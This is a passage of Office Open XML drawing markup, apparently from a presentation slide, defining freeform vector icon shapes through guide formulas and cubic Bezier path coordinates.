                      <a:pt x="28" y="0"/>
                      <a:pt x="28" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="0" y="24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65"/>
                      <a:pt x="13" y="78"/>
                      <a:pt x="28" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="78"/>
                      <a:pt x="57" y="65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9"/>
                      <a:pt x="57" y="49"/>
                      <a:pt x="57" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="48"/>
                      <a:pt x="57" y="48"/>
                      <a:pt x="57" y="48"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="48" y="49"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="49"/>
                      <a:pt x="48" y="49"/>
                      <a:pt x="48" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="54"/>
                      <a:pt x="46" y="59"/>
                      <a:pt x="42" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="66"/>
                      <a:pt x="34" y="68"/>
                      <a:pt x="28" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="68"/>
                      <a:pt x="27" y="68"/>
                      <a:pt x="26" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="61"/>
                      <a:pt x="43" y="50"/>
                      <a:pt x="43" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="35"/>
                      <a:pt x="43" y="34"/>
                      <a:pt x="43" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="38"/>
                      <a:pt x="48" y="43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8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="48"/>
                      <a:pt x="48" y="48"/>
                      <a:pt x="48" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="49"/>
                      <a:pt x="48" y="49"/>
                      <a:pt x="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4" name="Freeform 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D252FBE6-4595-4F87-985D-E0ED7343E9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08188" y="1823857"/>
                <a:ext cx="285770" cy="272068"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 52 w 89"/>
                  <a:gd name="T1" fmla="*/ 3 h 85"/>
                  <a:gd name="T2" fmla="*/ 4 w 89"/>
                  <a:gd name="T3" fmla="*/ 36 h 85"/>
                  <a:gd name="T4" fmla="*/ 3 w 89"/>
                  <a:gd name="T5" fmla="*/ 45 h 85"/>
                  <a:gd name="T6" fmla="*/ 28 w 89"/>
                  <a:gd name="T7" fmla="*/ 82 h 85"/>
                  <a:gd name="T8" fmla="*/ 37 w 89"/>
                  <a:gd name="T9" fmla="*/ 83 h 85"/>
                  <a:gd name="T10" fmla="*/ 85 w 89"/>
                  <a:gd name="T11" fmla="*/ 50 h 85"/>
                  <a:gd name="T12" fmla="*/ 87 w 89"/>
                  <a:gd name="T13" fmla="*/ 41 h 85"/>
                  <a:gd name="T14" fmla="*/ 61 w 89"/>
                  <a:gd name="T15" fmla="*/ 4 h 85"/>
                  <a:gd name="T16" fmla="*/ 52 w 89"/>
                  <a:gd name="T17" fmla="*/ 3 h 85"/>
                  <a:gd name="T18" fmla="*/ 38 w 89"/>
                  <a:gd name="T19" fmla="*/ 48 h 85"/>
                  <a:gd name="T20" fmla="*/ 31 w 89"/>
                  <a:gd name="T21" fmla="*/ 71 h 85"/>
                  <a:gd name="T22" fmla="*/ 11 w 89"/>
                  <a:gd name="T23" fmla="*/ 42 h 85"/>
                  <a:gd name="T24" fmla="*/ 38 w 89"/>
                  <a:gd name="T25" fmla="*/ 48 h 85"/>
                  <a:gd name="T26" fmla="*/ 14 w 89"/>
                  <a:gd name="T27" fmla="*/ 40 h 85"/>
                  <a:gd name="T28" fmla="*/ 52 w 89"/>
                  <a:gd name="T29" fmla="*/ 13 h 85"/>
                  <a:gd name="T30" fmla="*/ 43 w 89"/>
                  <a:gd name="T31" fmla="*/ 41 h 85"/>
                  <a:gd name="T32" fmla="*/ 14 w 89"/>
                  <a:gd name="T33" fmla="*/ 40 h 85"/>
                  <a:gd name="T34" fmla="*/ 39 w 89"/>
                  <a:gd name="T35" fmla="*/ 48 h 85"/>
                  <a:gd name="T36" fmla="*/ 50 w 89"/>
                  <a:gd name="T37" fmla="*/ 50 h 85"/>
                  <a:gd name="T38" fmla="*/ 51 w 89"/>
                  <a:gd name="T39" fmla="*/ 40 h 85"/>
                  <a:gd name="T40" fmla="*/ 74 w 89"/>
                  <a:gd name="T41" fmla="*/ 47 h 85"/>
                  <a:gd name="T42" fmla="*/ 38 w 89"/>
                  <a:gd name="T43" fmla="*/ 72 h 85"/>
                  <a:gd name="T44" fmla="*/ 39 w 89"/>
                  <a:gd name="T45" fmla="*/ 48 h 85"/>
                  <a:gd name="T46" fmla="*/ 51 w 89"/>
                  <a:gd name="T47" fmla="*/ 39 h 85"/>
                  <a:gd name="T48" fmla="*/ 55 w 89"/>
                  <a:gd name="T49" fmla="*/ 11 h 85"/>
                  <a:gd name="T50" fmla="*/ 75 w 89"/>
                  <a:gd name="T51" fmla="*/ 40 h 85"/>
                  <a:gd name="T52" fmla="*/ 51 w 89"/>
                  <a:gd name="T53" fmla="*/ 3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9" h="85">
                    <a:moveTo>
                      <a:pt x="52" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="36"/>
                      <a:pt x="4" y="36"/>
                      <a:pt x="4" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="38"/>
                      <a:pt x="0" y="42"/>
                      <a:pt x="3" y="45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30" y="85"/>
                      <a:pt x="34" y="85"/>
                      <a:pt x="37" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="50"/>
                      <a:pt x="85" y="50"/>
                      <a:pt x="85" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="48"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="87" y="41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9" y="1"/>
                      <a:pt x="55" y="0"/>
                      <a:pt x="52" y="3"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="38" y="48"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="71"/>
                      <a:pt x="31" y="71"/>
                      <a:pt x="31" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="42"/>
                      <a:pt x="11" y="42"/>
                      <a:pt x="11" y="42"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="38" y="48"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="14" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="13"/>
                      <a:pt x="52" y="13"/>
                      <a:pt x="52" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="41"/>
                      <a:pt x="43" y="41"/>
                      <a:pt x="43" y="41"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="14" y="40"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="39" y="48"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="50"/>
                      <a:pt x="50" y="50"/>
                      <a:pt x="50" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="40"/>
                      <a:pt x="51" y="40"/>
                      <a:pt x="51" y="40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38" y="72"/>
                      <a:pt x="38" y="72"/>
                      <a:pt x="38" y="72"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="39" y="48"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="51" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="11"/>
                      <a:pt x="55" y="11"/>
                      <a:pt x="55" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="40"/>
                      <a:pt x="75" y="40"/>
                      <a:pt x="75" y="40"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="51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:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30EBAA0C-B821-47BE-8793-95CED893C9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96621" y="1667271"/>
                <a:ext cx="217264" cy="221178"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 34 w 68"/>
                  <a:gd name="T1" fmla="*/ 0 h 69"/>
                  <a:gd name="T2" fmla="*/ 0 w 68"/>
                  <a:gd name="T3" fmla="*/ 35 h 69"/>
                  <a:gd name="T4" fmla="*/ 34 w 68"/>
                  <a:gd name="T5" fmla="*/ 69 h 69"/>
                  <a:gd name="T6" fmla="*/ 68 w 68"/>
                  <a:gd name="T7" fmla="*/ 35 h 69"/>
                  <a:gd name="T8" fmla="*/ 34 w 68"/>
                  <a:gd name="T9" fmla="*/ 0 h 69"/>
                  <a:gd name="T10" fmla="*/ 34 w 68"/>
                  <a:gd name="T11" fmla="*/ 62 h 69"/>
                  <a:gd name="T12" fmla="*/ 7 w 68"/>
                  <a:gd name="T13" fmla="*/ 35 h 69"/>
                  <a:gd name="T14" fmla="*/ 34 w 68"/>
                  <a:gd name="T15" fmla="*/ 7 h 69"/>
                  <a:gd name="T16" fmla="*/ 62 w 68"/>
                  <a:gd name="T17" fmla="*/ 35 h 69"/>
                  <a:gd name="T18" fmla="*/ 34 w 68"/>
                  <a:gd name="T19" fmla="*/ 62 h 69"/>
                  <a:gd name="T20" fmla="*/ 22 w 68"/>
                  <a:gd name="T21" fmla="*/ 24 h 69"/>
                  <a:gd name="T22" fmla="*/ 36 w 68"/>
                  <a:gd name="T23" fmla="*/ 35 h 69"/>
                  <a:gd name="T24" fmla="*/ 22 w 68"/>
                  <a:gd name="T25" fmla="*/ 45 h 69"/>
                  <a:gd name="T26" fmla="*/ 22 w 68"/>
                  <a:gd name="T27" fmla="*/ 24 h 69"/>
                  <a:gd name="T28" fmla="*/ 39 w 68"/>
                  <a:gd name="T29" fmla="*/ 24 h 69"/>
                  <a:gd name="T30" fmla="*/ 54 w 68"/>
                  <a:gd name="T31" fmla="*/ 35 h 69"/>
                  <a:gd name="T32" fmla="*/ 39 w 68"/>
                  <a:gd name="T33" fmla="*/ 45 h 69"/>
                  <a:gd name="T34" fmla="*/ 39 w 68"/>
                  <a:gd name="T35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" h="69">
                    <a:moveTo>
                      <a:pt x="34" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="0"/>
                      <a:pt x="0" y="16"/>
                      <a:pt x="0" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="53"/>
                      <a:pt x="15" y="69"/>
                      <a:pt x="34" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="69"/>
                      <a:pt x="68" y="53"/>
                      <a:pt x="68" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="16"/>
                      <a:pt x="53" y="0"/>
                      <a:pt x="34" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="34" y="62"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="62"/>
                      <a:pt x="7" y="50"/>
                      <a:pt x="7" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="19"/>
                      <a:pt x="19" y="7"/>
                      <a:pt x="34" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="7"/>
                      <a:pt x="62" y="19"/>
                      <a:pt x="62" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="50"/>
                      <a:pt x="50" y="62"/>
                      <a:pt x="34" y="62"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="22" y="24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22" y="45"/>
                      <a:pt x="22" y="45"/>
                      <a:pt x="22" y="45"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="22" y="24"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="39" y="24"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="35"/>
                      <a:pt x="54" y="35"/>
                      <a:pt x="54" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="45"/>
                      <a:pt x="39" y="45"/>
                      <a:pt x="39" y="45"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3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6" name="Freeform 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{352C97C4-BF78-42C2-AC51-372B886AC7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96444" y="2135072"/>
                <a:ext cx="172245" cy="197690"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 50 w 54"/>
                  <a:gd name="T1" fmla="*/ 12 h 62"/>
                  <a:gd name="T2" fmla="*/ 42 w 54"/>
                  <a:gd name="T3" fmla="*/ 5 h 62"/>
                  <a:gd name="T4" fmla="*/ 33 w 54"/>
                  <a:gd name="T5" fmla="*/ 0 h 62"/>
                  <a:gd name="T6" fmla="*/ 6 w 54"/>
                  <a:gd name="T7" fmla="*/ 0 h 62"/>
                  <a:gd name="T8" fmla="*/ 0 w 54"/>
                  <a:gd name="T9" fmla="*/ 6 h 62"/>
                  <a:gd name="T10" fmla="*/ 0 w 54"/>
                  <a:gd name="T11" fmla="*/ 56 h 62"/>
                  <a:gd name="T12" fmla="*/ 6 w 54"/>
                  <a:gd name="T13" fmla="*/ 62 h 62"/>
                  <a:gd name="T14" fmla="*/ 48 w 54"/>
                  <a:gd name="T15" fmla="*/ 62 h 62"/>
                  <a:gd name="T16" fmla="*/ 54 w 54"/>
                  <a:gd name="T17" fmla="*/ 56 h 62"/>
                  <a:gd name="T18" fmla="*/ 54 w 54"/>
                  <a:gd name="T19" fmla="*/ 21 h 62"/>
                  <a:gd name="T20" fmla="*/ 50 w 54"/>
                  <a:gd name="T21" fmla="*/ 12 h 62"/>
                  <a:gd name="T22" fmla="*/ 35 w 54"/>
                  <a:gd name="T23" fmla="*/ 9 h 62"/>
                  <a:gd name="T24" fmla="*/ 35 w 54"/>
                  <a:gd name="T25" fmla="*/ 9 h 62"/>
                  <a:gd name="T26" fmla="*/ 37 w 54"/>
                  <a:gd name="T27" fmla="*/ 10 h 62"/>
                  <a:gd name="T28" fmla="*/ 44 w 54"/>
                  <a:gd name="T29" fmla="*/ 17 h 62"/>
                  <a:gd name="T30" fmla="*/ 45 w 54"/>
                  <a:gd name="T31" fmla="*/ 19 h 62"/>
                  <a:gd name="T32" fmla="*/ 46 w 54"/>
                  <a:gd name="T33" fmla="*/ 20 h 62"/>
                  <a:gd name="T34" fmla="*/ 35 w 54"/>
                  <a:gd name="T35" fmla="*/ 20 h 62"/>
                  <a:gd name="T36" fmla="*/ 35 w 54"/>
                  <a:gd name="T37" fmla="*/ 9 h 62"/>
                  <a:gd name="T38" fmla="*/ 46 w 54"/>
                  <a:gd name="T39" fmla="*/ 54 h 62"/>
                  <a:gd name="T40" fmla="*/ 8 w 54"/>
                  <a:gd name="T41" fmla="*/ 54 h 62"/>
                  <a:gd name="T42" fmla="*/ 8 w 54"/>
                  <a:gd name="T43" fmla="*/ 8 h 62"/>
                  <a:gd name="T44" fmla="*/ 31 w 54"/>
                  <a:gd name="T45" fmla="*/ 8 h 62"/>
                  <a:gd name="T46" fmla="*/ 31 w 54"/>
                  <a:gd name="T47" fmla="*/ 23 h 62"/>
                  <a:gd name="T48" fmla="*/ 46 w 54"/>
                  <a:gd name="T49" fmla="*/ 23 h 62"/>
                  <a:gd name="T50" fmla="*/ 46 w 54"/>
                  <a:gd name="T51" fmla="*/ 5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4" h="62">
                    <a:moveTo>
                      <a:pt x="50" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="5"/>
                      <a:pt x="42" y="5"/>
                      <a:pt x="42" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="2"/>
                      <a:pt x="36" y="0"/>
                      <a:pt x="3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9"/>
                      <a:pt x="3" y="62"/>
                      <a:pt x="6" y="62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51" y="62"/>
                      <a:pt x="54" y="59"/>
                      <a:pt x="54" y="56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4" y="18"/>
                      <a:pt x="52" y="14"/>
                      <a:pt x="50" y="12"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="35" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="9"/>
                      <a:pt x="35" y="9"/>
                      <a:pt x="35" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="9"/>
                      <a:pt x="37" y="10"/>
                      <a:pt x="37" y="10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8"/>
                      <a:pt x="45" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="19"/>
                      <a:pt x="46" y="19"/>
                      <a:pt x="46" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="20"/>
                      <a:pt x="35" y="20"/>
                      <a:pt x="35" y="20"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="35" y="9"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="46" y="54"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="54"/>
                      <a:pt x="8" y="54"/>
                      <a:pt x="8" y="54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46" y="23"/>
                      <a:pt x="46" y="23"/>
                      <a:pt x="46" y="23"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="46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7" name="Freeform 38">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83776715-3E32-4698-9F56-77497FE8D1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82743" y="2730100"/>
                <a:ext cx="279899" cy="297514"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 78 w 87"/>
                  <a:gd name="T1" fmla="*/ 0 h 93"/>
                  <a:gd name="T2" fmla="*/ 9 w 87"/>
                  <a:gd name="T3" fmla="*/ 0 h 93"/>
                  <a:gd name="T4" fmla="*/ 0 w 87"/>
                  <a:gd name="T5" fmla="*/ 9 h 93"/>
                  <a:gd name="T6" fmla="*/ 0 w 87"/>
                  <a:gd name="T7" fmla="*/ 84 h 93"/>
                  <a:gd name="T8" fmla="*/ 9 w 87"/>
                  <a:gd name="T9" fmla="*/ 93 h 93"/>
                  <a:gd name="T10" fmla="*/ 78 w 87"/>
                  <a:gd name="T11" fmla="*/ 93 h 93"/>
                  <a:gd name="T12" fmla="*/ 87 w 87"/>
                  <a:gd name="T13" fmla="*/ 84 h 93"/>
                  <a:gd name="T14" fmla="*/ 87 w 87"/>
                  <a:gd name="T15" fmla="*/ 9 h 93"/>
                  <a:gd name="T16" fmla="*/ 78 w 87"/>
                  <a:gd name="T17" fmla="*/ 0 h 93"/>
                  <a:gd name="T18" fmla="*/ 75 w 87"/>
                  <a:gd name="T19" fmla="*/ 81 h 93"/>
                  <a:gd name="T20" fmla="*/ 12 w 87"/>
                  <a:gd name="T21" fmla="*/ 81 h 93"/>
                  <a:gd name="T22" fmla="*/ 12 w 87"/>
                  <a:gd name="T23" fmla="*/ 12 h 93"/>
                  <a:gd name="T24" fmla="*/ 75 w 87"/>
                  <a:gd name="T25" fmla="*/ 12 h 93"/>
                  <a:gd name="T26" fmla="*/ 75 w 87"/>
                  <a:gd name="T27" fmla="*/ 81 h 93"/>
                  <a:gd name="T28" fmla="*/ 23 w 87"/>
                  <a:gd name="T29" fmla="*/ 41 h 93"/>
                  <a:gd name="T30" fmla="*/ 64 w 87"/>
                  <a:gd name="T31" fmla="*/ 41 h 93"/>
                  <a:gd name="T32" fmla="*/ 64 w 87"/>
                  <a:gd name="T33" fmla="*/ 46 h 93"/>
                  <a:gd name="T34" fmla="*/ 23 w 87"/>
                  <a:gd name="T35" fmla="*/ 46 h 93"/>
                  <a:gd name="T36" fmla="*/ 23 w 87"/>
                  <a:gd name="T37" fmla="*/ 41 h 93"/>
                  <a:gd name="T38" fmla="*/ 23 w 87"/>
                  <a:gd name="T39" fmla="*/ 52 h 93"/>
                  <a:gd name="T40" fmla="*/ 64 w 87"/>
                  <a:gd name="T41" fmla="*/ 52 h 93"/>
                  <a:gd name="T42" fmla="*/ 64 w 87"/>
                  <a:gd name="T43" fmla="*/ 58 h 93"/>
                  <a:gd name="T44" fmla="*/ 23 w 87"/>
                  <a:gd name="T45" fmla="*/ 58 h 93"/>
                  <a:gd name="T46" fmla="*/ 23 w 87"/>
                  <a:gd name="T47" fmla="*/ 52 h 93"/>
                  <a:gd name="T48" fmla="*/ 23 w 87"/>
                  <a:gd name="T49" fmla="*/ 64 h 93"/>
                  <a:gd name="T50" fmla="*/ 64 w 87"/>
                  <a:gd name="T51" fmla="*/ 64 h 93"/>
                  <a:gd name="T52" fmla="*/ 64 w 87"/>
                  <a:gd name="T53" fmla="*/ 69 h 93"/>
                  <a:gd name="T54" fmla="*/ 23 w 87"/>
                  <a:gd name="T55" fmla="*/ 69 h 93"/>
                  <a:gd name="T56" fmla="*/ 23 w 87"/>
                  <a:gd name="T57" fmla="*/ 64 h 93"/>
                  <a:gd name="T58" fmla="*/ 23 w 87"/>
                  <a:gd name="T59" fmla="*/ 29 h 93"/>
                  <a:gd name="T60" fmla="*/ 64 w 87"/>
                  <a:gd name="T61" fmla="*/ 29 h 93"/>
                  <a:gd name="T62" fmla="*/ 64 w 87"/>
                  <a:gd name="T63" fmla="*/ 35 h 93"/>
                  <a:gd name="T64" fmla="*/ 23 w 87"/>
                  <a:gd name="T65" fmla="*/ 35 h 93"/>
                  <a:gd name="T66" fmla="*/ 23 w 87"/>
                  <a:gd name="T67" fmla="*/ 29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7" h="93">
                    <a:moveTo>
                      <a:pt x="78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9"/>
                      <a:pt x="4" y="93"/>
                      <a:pt x="9" y="93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83" y="93"/>
                      <a:pt x="87" y="89"/>
                      <a:pt x="87" y="84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7" y="4"/>
                      <a:pt x="83" y="0"/>
                      <a:pt x="78" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="75" y="81"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="81"/>
                      <a:pt x="12" y="81"/>
                      <a:pt x="12" y="8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81"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="23" y="41"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="41"/>
                      <a:pt x="64" y="41"/>
                      <a:pt x="64" y="41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23" y="46"/>
                      <a:pt x="23" y="46"/>
                      <a:pt x="23" y="46"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="23" y="41"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="23" y="52"/>
                    </a:move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8"/>
                      <a:pt x="64" y="58"/>
                      <a:pt x="64" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="58"/>
                      <a:pt x="23" y="58"/>
                      <a:pt x="23" y="58"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="23" y="52"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="23" y="64"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="64"/>
                      <a:pt x="64" y="64"/>
                      <a:pt x="64" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="69"/>
                      <a:pt x="64" y="69"/>
                      <a:pt x="64" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="69"/>
                      <a:pt x="23" y="69"/>
                      <a:pt x="23" y="69"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="23" y="64"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="23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23" y="35"/>
                      <a:pt x="23" y="35"/>
                      <a:pt x="23" y="35"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="23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DCD5A1B9-D455-469B-BB83-F0FD5BCDC4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1853" y="3084377"/>
                <a:ext cx="262282" cy="197690"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 134"/>
                  <a:gd name="T1" fmla="*/ 0 h 101"/>
                  <a:gd name="T2" fmla="*/ 0 w 134"/>
                  <a:gd name="T3" fmla="*/ 101 h 101"/>
                  <a:gd name="T4" fmla="*/ 134 w 134"/>
                  <a:gd name="T5" fmla="*/ 101 h 101"/>
                  <a:gd name="T6" fmla="*/ 134 w 134"/>
                  <a:gd name="T7" fmla="*/ 0 h 101"/>
                  <a:gd name="T8" fmla="*/ 0 w 134"/>
                  <a:gd name="T9" fmla="*/ 0 h 101"/>
                  <a:gd name="T10" fmla="*/ 25 w 134"/>
                  <a:gd name="T11" fmla="*/ 93 h 101"/>
                  <a:gd name="T12" fmla="*/ 8 w 134"/>
                  <a:gd name="T13" fmla="*/ 93 h 101"/>
                  <a:gd name="T14" fmla="*/ 8 w 134"/>
                  <a:gd name="T15" fmla="*/ 77 h 101"/>
                  <a:gd name="T16" fmla="*/ 25 w 134"/>
                  <a:gd name="T17" fmla="*/ 77 h 101"/>
                  <a:gd name="T18" fmla="*/ 25 w 134"/>
                  <a:gd name="T19" fmla="*/ 93 h 101"/>
                  <a:gd name="T20" fmla="*/ 25 w 134"/>
                  <a:gd name="T21" fmla="*/ 59 h 101"/>
                  <a:gd name="T22" fmla="*/ 8 w 134"/>
                  <a:gd name="T23" fmla="*/ 59 h 101"/>
                  <a:gd name="T24" fmla="*/ 8 w 134"/>
                  <a:gd name="T25" fmla="*/ 43 h 101"/>
                  <a:gd name="T26" fmla="*/ 25 w 134"/>
                  <a:gd name="T27" fmla="*/ 43 h 101"/>
                  <a:gd name="T28" fmla="*/ 25 w 134"/>
                  <a:gd name="T29" fmla="*/ 59 h 101"/>
                  <a:gd name="T30" fmla="*/ 25 w 134"/>
                  <a:gd name="T31" fmla="*/ 26 h 101"/>
                  <a:gd name="T32" fmla="*/ 8 w 134"/>
                  <a:gd name="T33" fmla="*/ 26 h 101"/>
                  <a:gd name="T34" fmla="*/ 8 w 134"/>
                  <a:gd name="T35" fmla="*/ 8 h 101"/>
                  <a:gd name="T36" fmla="*/ 25 w 134"/>
                  <a:gd name="T37" fmla="*/ 8 h 101"/>
                  <a:gd name="T38" fmla="*/ 25 w 134"/>
                  <a:gd name="T39" fmla="*/ 26 h 101"/>
                  <a:gd name="T40" fmla="*/ 102 w 134"/>
                  <a:gd name="T41" fmla="*/ 93 h 101"/>
                  <a:gd name="T42" fmla="*/ 35 w 134"/>
                  <a:gd name="T43" fmla="*/ 93 h 101"/>
                  <a:gd name="T44" fmla="*/ 35 w 134"/>
                  <a:gd name="T45" fmla="*/ 8 h 101"/>
                  <a:gd name="T46" fmla="*/ 102 w 134"/>
                  <a:gd name="T47" fmla="*/ 8 h 101"/>
                  <a:gd name="T48" fmla="*/ 102 w 134"/>
                  <a:gd name="T49" fmla="*/ 93 h 101"/>
                  <a:gd name="T50" fmla="*/ 126 w 134"/>
                  <a:gd name="T51" fmla="*/ 93 h 101"/>
                  <a:gd name="T52" fmla="*/ 110 w 134"/>
                  <a:gd name="T53" fmla="*/ 93 h 101"/>
                  <a:gd name="T54" fmla="*/ 110 w 134"/>
                  <a:gd name="T55" fmla="*/ 77 h 101"/>
                  <a:gd name="T56" fmla="*/ 126 w 134"/>
                  <a:gd name="T57" fmla="*/ 77 h 101"/>
                  <a:gd name="T58" fmla="*/ 126 w 134"/>
                  <a:gd name="T59" fmla="*/ 93 h 101"/>
                  <a:gd name="T60" fmla="*/ 126 w 134"/>
                  <a:gd name="T61" fmla="*/ 59 h 101"/>
                  <a:gd name="T62" fmla="*/ 110 w 134"/>
                  <a:gd name="T63" fmla="*/ 59 h 101"/>
                  <a:gd name="T64" fmla="*/ 110 w 134"/>
                  <a:gd name="T65" fmla="*/ 43 h 101"/>
                  <a:gd name="T66" fmla="*/ 126 w 134"/>
                  <a:gd name="T67" fmla="*/ 43 h 101"/>
                  <a:gd name="T68" fmla="*/ 126 w 134"/>
                  <a:gd name="T69" fmla="*/ 59 h 101"/>
                  <a:gd name="T70" fmla="*/ 126 w 134"/>
                  <a:gd name="T71" fmla="*/ 26 h 101"/>
                  <a:gd name="T72" fmla="*/ 110 w 134"/>
                  <a:gd name="T73" fmla="*/ 26 h 101"/>
                  <a:gd name="T74" fmla="*/ 110 w 134"/>
                  <a:gd name="T75" fmla="*/ 8 h 101"/>
                  <a:gd name="T76" fmla="*/ 126 w 134"/>
